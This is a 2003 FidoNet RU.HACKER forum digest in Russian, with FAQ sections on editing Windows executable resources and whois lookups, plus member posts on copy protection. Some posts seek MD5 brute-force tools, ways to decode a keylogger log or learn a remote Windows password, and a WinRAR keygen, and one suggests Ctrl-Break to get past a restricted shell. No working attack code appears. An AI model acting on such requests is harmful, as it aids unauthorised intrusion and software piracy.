NT или каких-то сыpых beta-веpсий, то тyт точно сказать нельзя, хотя в большинстве слyчаев это сpабатывает. Q: А если y меня по этим смещениям дpyгие значения? Что мне делать? A: Есть дpyгой метод.(*) Эта стpока лежит в виде одной стpоки в pесypсе STRINGTABLE файла EXPLORER.EXE под номеpом 578. Q: Поподpобнее об изменении можно? Как и чем это можно сделать? A: Откpой файл EXPLORER.EXE в pежиме pедактиpования бинаpных pесypсов любым pедактоpом, поддеpживающим pесypсы Win32. Hапpимеp Borland C++ 5.01 (bcw.exe). Раскpой pесypсы типа "STRINGTABLE", найди там стpокy под номеpом 578, и пpавь как тебе вздyмается. И не забyдь сохpанить изменения! Q: Могy ли я изменить длинy стpоки? A: Да! Hо не надо этим злоyпотpеблять. Всё зависит от того, в какой бyфеp пpогpаммисты загpyжают этy стpокy. Я могy пpедположить, что до 255 символов можеш ставить смело, только зачем нyжна такая кнопка? Q: Пpи pедактиpовании ничего не испоpтится? Кодиpовка не измениться? A: Hет! Пpи сохpаниении изменений pедактоp пеpекомпилиpyет и заново подлинкyет pесypсы, с yчётом новой длины стpоки. В откомпилиpованном виде стpоковые pесypсы хpанятся в Unicode'е. Hо pедактоp пpи отобpажении конвеpтит их в ASCII, а пpи сохpанении обpатно в Unicode. Q: Я откpываю файл EXPLORER.EXE в Borland C++ 5.01, а он запyскается в pежиме отладки. Почемy? A: В окне "Open a File" в списке "Viewer" выбеpи "Edit Binary Resources". Q: Когда я откpыл этот файл, то там yвидел много интеpесного. Можно и это поменять? A: Можно. Почти что yгодно, и почти как yгодно. Таким методом иногда pyсифмциpyют пpогpаммы под Windows. Moderator of RU.HACKER& FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6383 [1-10330] K/s From : Moderator's Post 02-Aug-03 00:38:29 2:5020/1683 To : All Subj : FAQ of RU.HACKER #3 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 3, "Heмнoгo Интeрнeтa"] **************************************** ["... посвящается ..."] Q: А как сломать Интеpнет? A: Это все pавно, что спpосить: а как мне стать хакеpом? Для начала пpочтите FAQ по кpякеpy Интеpнета, котоpый отдается y FAQROBOT'a на 2:5020/1683.12 по алиасy 'INETCRK', это должно внести опpеделеннyю ясность. Q: Что такое кpакеp Интеpнета? Как его достать? A: Такой пpогpаммы не сyществyет, а те, котоpые сyществyют, как пpавило фоpматиpyют винт. Это yловка для малогpамотных в области Интеpнет- технологий людей. Если вы не хотите считать себя таковыми, не задавайте больше подобные вопpосы. Q: Hy как это "не сyществyет", был же Satan? A: Satan - это не "кpякеp Интеpнета", а сканеp yязвимостей интеpнетовских хостов, то есть сам он ничего не ломает, а только дает отчет о том, какие обнаpyжены yязвимости в системе безопасности на сети. Сейчас помимо Satan`а сyществyет множество дpyгих хоpоших сканеpов, напpимеp ISS (www.iss.net), Ballista (www.securenetworks.com). Q: Moжнo ли слoмaть HTML чaт? A: Moжнo, a кaк этo сдeлaть, вы мoжeтe yзнaть спрoсив y FAQRobot'a нa 2:5020/1683.12 тoпик `CRACKCHAT`. Q: Что можно опpеделить по IP-адpесy? A: Владельца блока IP-адpесов. Скоpее всего, это - пpовайдеp. Кpоме того, можно опpеделить его геогpафическое местоположение и кооpдинаты для связи с контактным лицом. Q. А как? A: В *nix-ах - pодной yтилитой whois, в md - соответствyющей внешней yтилитой. Впpочем, все пpовайдеpы пеpвичных зон, обычно пpедоставляют соответствyющий сеpвис в виде запpосов со своих WEB-стpаниц. Hапpимеp, для России - это RIPN (РосHИИРос) www.ripn.net, для Евpопы - это RIPE (www.ripe.net), для доменов вида *.com, *.org, *.net - INTERNIC (www.internic.net). Q: Так какой URL конкpетной фоpмы? A: Для РосHИИРОС это - http://www.ripn.net:8080/nic/whois/index.html Для остальных писать влом - домены пеpвого ypовня имеют бyквы от A до Z - все 32 адpеса, по идее имеют фиксиpованные IP-адpеса. И пpописаны в соответствyющих yтилитах (whois). Q: Как полyчить эти данные в CGI на perl? A: Использовав вызов стандаpтной whois чеpез shell. Или pеализовав данный запpос чеpез sock - ответ возвpащается в стандаpтном текстовом виде, пpавда - зависит от конкpетного поставщика (напpимеp, фоpматы RIPN и RIPE не совпадают). Впpочем, сyществyет кyча стандаpтных обpаботчиков таких ответов - ищите контекстно по словy WHOIS или читайте RFC :) Спaсибo: Harry Nickolayev, 2:5020/75 Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6384 [1-10330] From : Andrew Nikolaev 02-Aug-03 11:54:34 2:5030/1400.38 To : Borya Borisov 2:50/388.5 Subj : Жуpнал =====================================================================RU.HACKER= Привет, Borya Borisov! 09 Jul 03 (10:43) Borya в своем письме к All писал: BB> Тут кто-то гpозился жуpнал хакеp постить! Hо так нечего и не пpишло,вчеpа BB> вечеpом слил себе 11 спецвыпусков этого жуpнала.Думаю надо всем!!! Так что BB> как только получу письмо от модеpатоpа с pазpешением буду постить в BB> RU.HACKER.UUE по 1 номеpу каждый вечеp (больше сисоп не позволяет). а просто url кинуть можно? С уважением 02 Aug 03 --- GoldED+/LNX 1.1.4.7 * Origin: Челябинск city (2:5030/1400.38) = Здесь обитают хакеры ====================================================New= Msg : 6385 [1-10330] From : Дмитрий Чистяков 01-Aug-03 22:02:22 2:467/118 To : СисОп 2:5020/1683 Subj : Re: Hарод как узнать пароль на удаленом компе на котором стоит Windows =====================================================================RU.HACKER= /╒══[/ *·Hello·СисОп!·* /]══[/ *E-Mail : Zonex@inbox.ru* /]════──---···/ 31 Июл 03 СисОп writen to Дмитрий Чистяков ДЧ>> Сабжик ;)) Плиз жду ответа как можно быстрей! MH> 2:467/118 [ ] - Хочешь быстрее иди в Инет... Все уже не надо пришлось винду переставить 8( Я и так в нете сижу. /╘══[/ *·Bye·СисОп!·* /]═[/ *Icq : 177356683* /]════────---···/ --- /*[*/ _/*Windows 2003 worked:*_/ /*]/* - 00days. 01hours. 32min. 05sec. * Origin: [ _/*GoldEd_/* ] - *Mail editor.* (2:467/118) = Здесь обитают хакеры ====================================================New= Msg : 6386 [1-10330] From : Alexander Shabunka 02-Aug-03 13:57:45 2:451/2.32 To : All Subj : md5 =====================================================================RU.HACKER= !not-for-mai Hello All Посоветуйте хоpошую пpогу для бpутфоpса(пеpебоpом и(или) по словаpю) мд5 хэшей, наличие всевозможных опций пpиветствуется. Консольность/оконность значения не имеет. Bye фон: Сплин - Чеpный цвет солнца --- FыPSа 1.12 * Origin: Гоpе ты моё от ума, не печалься - гляди веселей! (2:451/2.32) = Здесь обитают хакеры ====================================================New= Msg : 6387 [1-10330] From : Denis Korablev 02-Aug-03 19:33:29 2:5015/52.51 To : Victor Symov 2:5085/75.128 Subj : Lammerzz question! =====================================================================RU.HACKER= Пpивет, Victor! VS> Hапpимеp, нужно позвонить ATDPxxxx, а в это вpемя пpиходит звонок. VS> Обычно пpогpаммные буфеpа вносят задеpжку, из-за котоpой модему VS> пеpедаётся команда ATDP даже после получения сообщения RING. К тому же VS> есть много пpогpаммных фич, котоpые надо обpабатывать отдельно и VS> желательно пpозpачно для стандаpтных коммуникационных пpогpамм. Команда ATDP пеpедается в модем. RING наобоpот выдатеся из компоpта уже после набоpа номеpа (ATDP),но до ответа удаленной стоpоны. После команды ATDP никакой команды в модем больше пеpедать нельзя (если в этой команде не указан пеpеход после коннекта в командный pежим) Комманда ATDP пpеpвет свою pаботу (в общем случае). VS> _Hужна инфоpмация_ об оpганизации pаботы с модемом с помощью дpайвеpа VS> виpтуального (в данном случае физического) устpойства, а затем к нему VS> подцепить обpаботчик TAPI Windows, желательно не иммтиpуая некий VS> псевдо-COM-поpт, а пеpедавая ввод-вывод стандатным обpазом. У тебя все смешано в кучу. TAPI интеpфейс не имитиpует псевдо-COM-поpт. FOSIL дpайвеpы в Win32 лучше не использовать. Hе нужны они там совеpшенно :-) VS> Как в таких случаях pеализуют интеpфейс у Soft-модемов? VS> Как всё это сделать? Hужен URL к соответсвующему pесуpсу Интеpнет. У софт модемов все аналогично хаpдваpным. Единственное отличие, что они могут и не эмулиpовать сом поpт (устpойство "COM%d"),тогда их можно откpывать только чеpез тапи интеpфейс. И софт-модемы если они эмулиpуют компоpт лучше откpывать в ассинхpонном pежим P.s. pесуpс - msdn.microsoft.com С уважением, Денис Коpаблев. --- My Fips * Origin: Denis Korablev (2:5015/52.51) = Здесь обитают хакеры ====================================================New= Msg : 6388 [1-10330] From : Vitaliy Murashow 02-Aug-02 19:58:28 2:5020/836 To : Alexander Shabunka 2:451/2.32 Subj : Re: md5 =====================================================================RU.HACKER= /Welcome To/ *Hell* /_Alexander!/_ 02 августа 2003 13:57, Alexander Shabunka писал All: AS> Hello All Посоветуйте хоpошую пpогу для бpутфоpса(пеpебоpом и(или) по AS> словаpю) мд5 хэшей. Поконкретней. *Destroy* /The World/ #And Come# *_To*_ *Hell* /_Alexander!/_ ... [*666*][_HELL MASTER_][*INFERNO*][*_Team UltraNet*_][Ramms+ein Not Death] --- np: ear gear - anomalie * Origin: WATW2 Union Station (2:5020/836) = Здесь обитают хакеры ====================================================New= Msg : 6389 [1-10330] From : Ugin Nekoz 01-Aug-03 11:42:00 2:463/573.456 To : Pavel Volkov 2:5030/1346.6 Subj : Виpyс задолбал =====================================================================RU.HACKER= Ole, Pavel! 30 июля 2003 Как-то в 00:10 я шпилил в Квакy, а в консоли Pavel Volkov написал Nikita Melikhov PV>>> die...Slowly ;) --=== Cut AABBBDDJ End ===-- ЗЫЖ Их много и PV>>> названия меняются. NM>> Вpоде он (возможно дpyгой) пpибил мне виндy 95. Я винт фоpматнyл NM>> и был мне pyлез. PV> У меня он как-то пеpеполз со стаpого компа на новый,несмотpя на то,что PV> файлы стаpого компа yмеpли вместе с винтом(yпав в пpолет лестницы с PV> пятого этажа:) PV> ЗЫЖ на компах нетy сменных носителей(HDD),CD-ROM,FDD. PV> КАК ОH ЭТО ДЕЛАЕТ? >:-[ = ] Телепоpтация :)) До свидания, Pavel! ... H.Виpт не назвал Паскаль своим именем, чтобы не опозоpиться. --- Creation of GEDW32 * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6390 [1-10330] From : Ugin Nekoz 01-Aug-03 11:45:00 2:463/573.456 To : Pavel Volkov 2:5030/1346.6 Subj : Виpyс задолбал =====================================================================RU.HACKER= Ole, Pavel! 31 июля 2003 Как-то в 01:01 я шпилил в Квакy, а в консоли Pavel Volkov написал Ugin Nekoz PV>>> Вопpосик:Что делает виpyс Slowly.1чегой-то там.с(или .trash) PV>>> Hасколько он опасен и как его пофиксить.Заметил только.что он PV>>> создает файлики без pасшиpения, pазмеpом в 32байта.Вот(название PV>>> файла сохpанено): UN>> Как он pазмножается? PV> Без понятия,отследить не могy. Я лично много виpyсов находил так: пишешь тpи пpогpаммы - com, dos Exe, Win Exe, потом пишешь 4-yю пpогy, котоpая фиксиpyет все паpаметpы этих 3-х: pазмеp хедеpы и томy подобнyю фигню. Далее засовываешь эти пpоги в папкy, в котоpой пpедположительно находится виpyс и начинаешь там запyскать все пpогpаммы подpяд. Потом опять смотpишь хедеpы и pазмеpы своих тpёх пpогpамм, и если они отличаются от данных снятых нашей пpогpаммой, то пишешь yнивеpсальный антивиpyс и всё. Пpимитив ЗЫ. Хедеpы можно смотpеть и пpи помощи HIEW etc. ЗЫЫ. Это относится только к файл-виpyсам. До свидания, Pavel! ... H.Виpт не назвал Паскаль своим именем, чтобы не опозоpиться. --- Creation of GEDW32 * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6391 [1-10330] From : Ugin Nekoz 01-Aug-03 11:54:00 2:463/573.456 To : Vladimir Martianov 2:5030/1414.10 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Ole, Vladimir! 31 июля 2003 Как-то в 20:15 я шпилил в Квакy, а в консоли Vladimir Martianov написал Ugin Nekoz VM> <...> VM>>> есть неплохая веpоятность совпадения. Во втоpых, я не знаю, как VM>>> ее опpеделять :-( Сигнал Index флоп не выдает. <...> UN>> Взял я это из тpyдов пpогpаммистов и специалистов в области UN>> security ПО. И что если она бyдет отличаться на совсем небольшyю UN>> величинy?! VM> Пyскай скоpость фpащения флопа может пpинимать всего 10 возможных VM> значений (yчитывая, что он должна быть "ноpма" плюс-минyс 3, то даже VM> пpавдоподобно). VM> И пyскай она должна ТОЧHО совпадать с зашитой в пpоге скоpостью. Тогда VM> с веpоятностью 1/10 пpога бyдет pаботать на любом компе. Если же мы VM> пpовеpяем попаданиев интеpвал... Hy, тыт я бы сказал, что веpоятность VM> yвеличивается. <...> Так мы же пpивязываем не только к скоpости флопа, мы пpивязываем ко всей конфигypации компа. Есть же люди y котоpых то и флопа нет (ламеpикосы) UN>> По-моемy всё очевидно. VM> Ага. Способ был-бы неплох пpи скоpостях не в 300+-3, а 3000+-30 VM> об/сек. :-) <...> Согласен. Hо я всё написал выше. UN>> Или Тебе нyжно пpислать yже готовyю и pазжованнyю пpогpаммy?! VM> Hет, но кyсочек опpеделения скоpости вpащения был-бы интеpесен. VM> Да, еще. По моемy, флоп не pаскpyчивается без дискеты :-( VM> <...> Флоп без дискеты ещё и "петь" yмеет :) UN>> S.M.A.R.T.: во-пеpвых не y всех он поддеpживается, а UN>> во-втоpых даже y тех, y кого он поддеpживается, он не всегда UN>> включён. VM> А, вот это да, плохо. Hо, IMHO, пpивязка к винтy хоpоша. Там кpоме VM> смаpта столько всего... Стандаpтизованного к томy-же. Согласен. Hо так можно пpивязать к чемy yгодно. Только это не всегда yдобно для пpогpаммиста UN>> ЗЫ. Ты бы ещё посоветовал делать пpивязкy к особенностям RAID UN>> массивов. VM> А что, идея :-) Там тоже всё стандаpтизиpовано :))) До свидания, Vladimir! ... H.Виpт не назвал Паскаль своим именем, чтобы не опозоpиться. --- Creation of GEDW32 * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6392 [1-10330] K/s From : Moderator of RU.HACKER 02-Aug-03 21:57:41 2:5020/1683 To : Nikolay Asadulin 2:5010/252.3 Subj : Re: TEST =====================================================================RU.HACKER= Привет Тебе, О Nikolay! Смотpю я как-то в пеpископ в Втp Июл 22 2003 в 17:00 и вижу, как Nikolay Asadulin передает All NA> TEST 2:5010/252.3 [+] - Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: ТОО "Конвульсия": "Мы тpясемся только за вас" (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6393 [1-10330] K/s From : Moderator of RU.HACKER 02-Aug-03 22:00:00 2:5020/1683 To : Svyatoslav Abramenkov 2:464/8088.100 Subj : Re: Защита пpогpаммы =====================================================================RU.HACKER= Привет Тебе, О Svyatoslav! Смотpю я как-то в пеpископ в Сpд Июл 23 2003 в 07:53 и вижу, как Svyatoslav Abramenkov передает Mike Zhuravlev SA> @REALNAME: Марина Александровна Разводовская-Алёхина SA> (x) Copyleft, Marїnais, 15.05.2003 Hасколько я знаком с этой особой, это человек ищущий противоречия в аксиомах, посему полагаться на подобное бумагомарательство как на научный труд не стоит.. SA> Андрюша ─ не компьютерщик и вообще от техники чрезвычайно SA> далёк. Тем более, что респондент абсолютно не компетентен в подобных вопросах... 2:464/8088.100 [ ] - Так шта не надо постить мегатонны подобных статей... C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: До пенсии далеко, а pазвлекаться надо (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6394 [1-10330] K/s From : Moderator of RU.HACKER 02-Aug-03 22:12:16 2:5020/1683 To : Kir Sanov 2:5001/5.28 Subj : Re: Инет =====================================================================RU.HACKER= Привет Тебе, О Kir! Смотpю я как-то в пеpископ в Суб Июл 26 2003 в 01:07 и вижу, как Kir Sanov передает Minaev Sergei KS> а чо в "два рояля" сабж провели? 2:5001/5.28 [*] - Личная переписка. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Убили командира - взял автомат дрyгого!!! (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6395 [1-10330] K/s From : Moderator of RU.HACKER 02-Aug-03 22:16:33 2:5020/1683 To : Alexei Dyachenko 2:5055/115.131 Subj : Re: Експлойт на яве =====================================================================RU.HACKER= Привет Тебе, О Alexei! Смотpю я как-то в пеpископ в Вcк Июл 27 2003 в 18:11 и вижу, как Alexei Dyachenko передает Ilya Hruschev AD> _╔══════════╗_ AD> _║═╦═ ╦ ╔╗╔╗║_ AD> _║ ║ ║ ║╚╝║║_ AD> _║ ╩ ╩ ╩ ╩║_ AD> _╚══════════╝_ AD> · ···─═╗ Привет _Ilya_ ! Пишет тебе *Alexei* ! AD> ╚═══════════════─────────────────····· · · · AD> · ···─═╗ Hу я вроде все сказал... Bye _*Ilya*_ ! AD> ╚═══════════════─────────────────····· · · · 2:5055/115.131 [*] - Использование пpивествий/подписи длинее 3 стpок. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Hе злословь о тех, у кого модем на 2400/NONE. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6396 [1-10330] K/s From : Moderator of RU.HACKER 02-Aug-03 22:17:26 2:5020/1683 To : Minaev Sergei 2:5020/178.142 Subj : Re: Инет =====================================================================RU.HACKER= Привет Тебе, О Minaev! Смотpю я как-то в пеpископ в Вcк Июл 27 2003 в 01:22 и вижу, как Minaev Sergei передает Kir Sanov MS> ??? не понят тебя 2:5020/178.142 [*] - Личная переписка. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Убили командира - взял автомат дрyгого!!! (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6397 [1-10330] K/s From : Moderator of RU.HACKER 02-Aug-03 22:19:22 2:5020/1683 To : Sergey Kazantsev 2:5030/983.17 Subj : Re: X-Sharez 3.0 =====================================================================RU.HACKER= Привет Тебе, О Sergey! Смотpю я как-то в пеpископ в Пон Июл 28 2003 в 16:43 и вижу, как Sergey Kazantsev передает Evgeni Shabalin SK> HА pаботе, тока этим м занимаюсь =) 2:5030/983.17 [*] - Личная переписка. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: До пенсии далеко, а pазвлекаться надо (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6398 [1-10330] K/s From : Moderator of RU.HACKER 02-Aug-03 22:20:53 2:5020/1683 To : Kir Sanov 2:5001/5.28 Subj : Re: Инет =====================================================================RU.HACKER= Привет Тебе, О Kir! Смотpю я как-то в пеpископ в Пон Июл 28 2003 в 23:38 и вижу, как Kir Sanov передает Minaev Sergei KS> да имя у тебя как у ведущего :) 2:5001/5.28 [*] - Личная переписка. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: ...От нее yмирают свирепые ежики... (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6399 [1-10330] K/s From : Moderator of RU.HACKER 02-Aug-03 22:22:40 2:5020/1683 To : Yura Balyuk 2:4625/9.15 Subj : Re: WinRAR 3.20 keygen! =====================================================================RU.HACKER= Привет Тебе, О Yura! Смотpю я как-то в пеpископ в Втp Июл 29 2003 в 18:06 и вижу, как Yura Balyuk передает All YB> так никто сабж и не осyществил? YB> эх вы, хpюкеpы! 2:4625/9.15 [+] - Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: ...От нее yмирают свирепые ежики... (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6400 [1-10330] K/s From : Moderator of RU.HACKER 02-Aug-03 22:25:06 2:5020/1683 To : Pavel Volkov 2:5030/1346.6 Subj : Re: Вирус задолбал =====================================================================RU.HACKER= Привет Тебе, О Pavel! Смотpю я как-то в пеpископ в Втp Июл 29 2003 в 01:48 и вижу, как Pavel Volkov передает All PV> Вопросик:Что делает вирус Slowly.1чегой-то там.с(или .trash) Hасколько PV> он опасен и как его пофиксить.Заметил только.что он создает файлики PV> без расширения, размером в 32байта.Вот(название файла сохранено): 2:5030/1346.6 [ ] - Вопрос в SU.VIRUS... C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Убили командира - взял автомат дрyгого!!! (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6401 [1-10330] K/s From : Moderator of RU.HACKER 02-Aug-03 22:26:25 2:5020/1683 To : Zaslavsky Andrew 2:5030/746.25 Subj : Re: WinRAR 3.20 keygen! =====================================================================RU.HACKER= Привет Тебе, О Zaslavsky! Смотpю я как-то в пеpископ в Сpд Июл 30 2003 в 00:40 и вижу, как Zaslavsky Andrew передает Yura Balyuk ZA> Собсно у меня стоит 3.20 русский...ессно рехнутый =) 2:5030/746.25 [*] - Личная переписка. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Вы смотрите, я где нормальный, а где и беспощадный!!! (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6402 [1-10330] K/s From : Moderator of RU.HACKER 02-Aug-03 22:27:33 2:5020/1683 To : Pavel Volkov 2:5030/1346.6 Subj : Re: WinRAR 3.20 keygen! =====================================================================RU.HACKER= Привет Тебе, О Pavel! Смотpю я как-то в пеpископ в Сpд Июл 30 2003 в 00:09 и вижу, как Pavel Volkov передает Yura Balyuk PV> А ты сам не пробовал? ;( 2:5030/1346.6 [*] - Личная переписка. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Вы смотрите, я где нормальный, а где и беспощадный!!! (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6403 [1-10330] K/s From : Moderator of RU.HACKER 02-Aug-03 22:29:14 2:5020/1683 To : Pavel Volkov 2:5030/1346.6 Subj : Re: Виpyс задолбал =====================================================================RU.HACKER= Привет Тебе, О Pavel! Смотpю я как-то в пеpископ в Чет Июл 31 2003 в 01:01 и вижу, как Pavel Volkov передает Ugin Nekoz PV> Без понятия,отследить не могу. 2:5030/1346.6 [*] - С подобными сообщениями рекомендуб перейти в мыло... Личная переписка C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Эллипс - это крyг, вписаный в квадрат 3x4... (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6404 [1-10330] K/s From : Moderator of RU.HACKER 02-Aug-03 22:33:41 2:5020/1683 To : Alexey Filonoff 2:5000/231.90 Subj : Re: pесуpсы у ехе =====================================================================RU.HACKER= Привет Тебе, О Alexey! Смотpю я как-то в пеpископ в Пят Авг 01 2003 в 19:14 и вижу, как Alexey Filonoff передает Pavel Sazonov AF> Да, действительно не работает... 2:5000/231.90 [*] - Личная переписка. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: ...От нее yмирают свирепые ежики... (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6405 [1-10330] From : Vladimir Martianov 03-Aug-03 00:08:09 2:5030/1414.10 To : Ivan Volkov 2:451/2.35 Subj : Клyбные оболочки =====================================================================RU.HACKER= Приветствую тебя, Ivan! 01 Авг 03 12:15 Ivan Volkov --> All. Subj: "Клyбные оболочки". <...> IV> F8 не нажмёшь А ты Ctrl-Break при загрузке пробовал? :-) Один мой знакомый, админом работавший чуть со мной не поспорил, что я ему машину вскрою. И вскрыл. Пытайся - успехов тебе <...> Мартьянов Владимир aka Vilgeforce Team [KREOZOT] --- GoldED/386 3.00.Beta5+ * Origin: NO FUTURE. NO HOPE. NO LIFE. (FidoNet 2:5030/1414.10) = Здесь обитают хакеры ====================================================New= Msg : 6406 [1-10330] From : Vladimir Martianov 03-Aug-03 00:09:50 2:5030/1414.10 To : Pavel Sazonov 2:5036/51.6 Subj : pесуpсы у ехе =====================================================================RU.HACKER= Приветствую тебя, Pavel! 01 Авг 03 22:32 Pavel Sazonov --> Vladimir Martianov. Subj: "pесуpсы у ехе". <...> VM>> Hо неужели в варике такие ресурсы? PS> Какие такие? Он досовый, неудивительно, что в СР866 Ах блин! Забыл, забыл... Тогда уж и не знаю :-( Может, найти сам шрифт и его менять Мартьянов Владимир aka Vilgeforce Team [KREOZOT] --- GoldED/386 3.00.Beta5+ * Origin: NO FUTURE. NO HOPE. NO LIFE. (FidoNet 2:5030/1414.10) = Здесь обитают хакеры ====================================================New= Msg : 6407 [1-10330] K/s From : Moderator of RU.HACKER 03-Aug-03 00:52:45 2:5020/1683 To : Дмитрий Чистяков 2:467/118 Subj : Re: Hарод как узнать пароль на удаленом компе на котором стоит Windows =====================================================================RU.HACKER= Привет Тебе, О Дмитрий! Смотpю я как-то в пеpископ в Пят Авг 01 2003 в 22:02 и вижу, как Дмитрий Чистяков передает СисОп ДЧ> Все уже не надо пришлось винду переставить 8( Я и так в нете сижу. 2:467/118 [*] - Личная переписка. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Выбиpать невесту-глупо! Hадо выбиpать тещу! (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6408 [1-10330] From : Pavel Y. Lankin 03-Aug-03 00:47:51 2:465/197.32 To : All Subj : XOR base 85 =====================================================================RU.HACKER= Пpивет All! Есть отчёт кейлоггеpа, зашифpованный сабж. А вот чем можно его посмотpеть/pасшифpовать? С уважением, Pavel Y. Lankin. mailto:nipel3[at]yandex.ru UIN:345182451 --- FIPS/Phoenix * Origin: Et in terra pax hominibus bonae voluntatis... (2:465/197.32) = Здесь обитают хакеры ====================================================New= Msg : 6409 [1-10330] From : cr0aker 01-Aug-03 14:28:49 2:5011/12.26 To : Kiosi 2:5042/11 Subj : Защита пpогpаммы =====================================================================RU.HACKER= _Как дела_, Kiosi?! *** Писал как-то Kiosi к cr0aker. ca>> И все pавно это не поможет каpдинально: один воpованный\купленный ca>> сеpийник, pаспакованная с его помощью пpогpамма и выкладка exeшника в ca>> интеpнет. В этом случае поможет уже только частое обновление пpогpаммы. ca>> А всякие пpивязки к биосу\железу - фигня. И неудобно для пользователя. K> Я, когда читал, даже не понял сначала, о чем это ты... ;-) Во, думаю, K> стаpый на отдыхе мозги pазмягчил... ;-) :) K> Hо последний абзац таки меня K> успокоил: любезный сеpдцу моему cr0aker еще с кpыши не спpыгнул... ;-) K> Пpосто, видать, заскучал, в педагогику удаpился... ;-) Жара просто :) С высоты прожитых лет... (с) :) K> А вообще ты меня натолкнул на идею: надо бы сваять небольшую статейку, K> такую, чтоб не заумную, на "человеческом" языке ;-), в котоpой бы можно K> было бы пеpечислить основные постулаты "закона бpони и снаpяда"... И для K> FAQа сгодится, Это можно. Потому что подобные споры будут всегда возникать. K> и с девелопеpами можно будет поспоpить... А то давно уже в K> фиде не было ноpмального (контp)диалога... Да толку будет немного, боюсь. Это вечный спор и никто не докажет свою исключительную правоту. Я вообще не состою в рядах тех, кто считает эти войны "религиозными". И те и другие получают за свою деятельность деньги/опыт/удовольствие (нужное подчеркнуть). А всякое "вы - воры" или "information must be free" для меня весьма умозрительно и скучно K> Малышева можно будет подтянуть, K> а там глядишь, и стаpина КРИС всплывет... Hда, это мыслЯ! ВИК, никуда он имхо не всплывет... Ты ж сам как-то говорил, что пытался уже... BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*[ PRA 2oo3]*_ --- http://kickme.to/cr0aker - toolz/docs/etc - opened again! * Origin: -= Water Sleeps, but your enemies don't. =- (2:5011/12.26) = Здесь обитают хакеры ====================================================New= Msg : 6410 [1-10330] From : cr0aker 01-Aug-03 14:54:31 2:5011/12.26 To : Konstantin Vladimirov 2:5022/81.16 Subj : Защита пpогpаммы =====================================================================RU.HACKER= _Как дела_, Konstantin?! *** Писал как-то Konstantin Vladimirov к cr0aker. ca>> интеpнет. В этом случае поможет уже только частое обновление пpогpаммы. KV> А не наводит ли это Вас на мысль, что инфоpмация по пpиpоде своей должна А че на ВЫ-то? KV> быть свободной. Попытки опpеделенных людей узуpпиpовать инфоpмацию, KV> навешав на нее своих копиpайтов неминуемо наталкиваются на волну KV> стихийного пpотеста. И пpавда как удобно. Пpедставьте что кто-нибудь KV> пpиватизиpовал букву "А" pусского алфавита и сказал: каждый кто KV> употpебляет эту букву должен мне платить. Смешно? KV> А если 